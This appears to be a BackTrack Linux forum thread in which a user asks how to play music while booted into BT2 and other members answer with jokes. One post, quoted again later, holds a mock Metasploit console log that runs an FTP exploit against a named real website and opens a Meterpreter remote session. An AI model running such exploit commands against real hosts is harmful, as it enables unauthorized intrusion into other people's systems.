Thread: USB with music on in BT2

Just burned his ISO

Default USB with music on in BT2

i was wondering when i plug my mp3 player into my laptop and i have BT2 booted how to i play the music coz it doesent comeup or anything would someone please help me out thank you

Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA

Quote Originally Posted by buns234k View Post
    i was wondering when i plug my mp3 player into my laptop and i have BT2 booted how to i play the music coz it doesent comeup or anything would someone please help me out thank you
    It doesn't come up because the Dev's didn't think that playing music was important to doing Pen Testing.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

Developer

I can however give you a comprehensive tutorial on how to stream Oprah live with xine on your BT3 laptop

Seriously though. Streakers right.There was limited space on the bt3 disc so alot of "extra" stuff was ommited. You will have to google and find the drivers for whatever your player is.

Quote Originally Posted by buns234k View Post
    WTF......It's an MP3 player!!!!! Plug some headphones in and use it as intended
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Quote Originally Posted by thorin View Post
    WTF......It's an MP3 player!!!!! Plug some headphones in and use it as intended
    Thats exactly what I do since the kernel does not support my IntelHD audio card. Ubuntu's kernel supports my audio card, but I do not like Ubuntu, everything I need is in B|T. News feeds would be nice to listen to while pentesting...but as everyone has stated, no need for nonsense like that while pentesting.

Buns: Why dont you use your mp3 player ... or even listen to music on another computer on your network

Developer

Nothing spells success like the sweet soothing sound of Oprah voice in the background while the meterpreter .dll is uploading.

msf exploit(samiftp_user) > rexploit -z[*] Started reverse handler[*] Connecting to FTP server www2.oprah.com[*] Connected to target FTP server.[*] Trying target Windows XP Pro SP0/SP1 English...[*] Transmitting intermediate stager for over-sized stage...(89 bytes)[*] Sending stage (2834 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (73739 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (172.10.1.103:65535 -> www2.oprah.com)[*] Session 1 created in the background.
    msf exploit(samiftp_user) > sessions -l

Active sessions
    ===============

Id Description Tunnel
    -- ----------- ------
    1 Meterpreter 172.10.1.103:65535 -> www2.oprah.com

msf exploit(samiftp_user) > sessions -i 1[*] Starting interaction with

Senior Member imported_spankdidly's Avatar

Quote Originally Posted by pureh@te View Post
    Nothing spells success like the sweet soothing sound of Oprah voice in the background while the meterpreter .dll is uploading.

msf exploit(samiftp_user) > rexploit -z[*] Started reverse handler[*] Connecting to FTP server www2.oprah.com[*] Connected to target FTP server.[*] Trying target Windows XP Pro SP0/SP1 English...[*] Transmitting intermediate stager for over-sized stage...(89 bytes)[*] Sending stage (2834 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (73739 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (172.10.1.103:65535 -> www2.oprah.com)[*] Session 1 created in the background.
    msf exploit(samiftp_user) > sessions -l

Active sessions
    ===============

Id Description Tunnel
    -- ----------- ------
    1 Meterpreter 172.10.1.103:65535 -> www2.oprah.com

msf exploit(samiftp_user) > sessions -i 1[*] Starting interaction with
    lol, there's just something wrong with that...
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

Developer

Yes. The thought is a little disturbing.

Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA

Quote Originally Posted by pureh@te View Post
    Yes. The thought is a little disturbing.
    Admit it, you want to take it from streaming Oprah to screaming Oprah.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.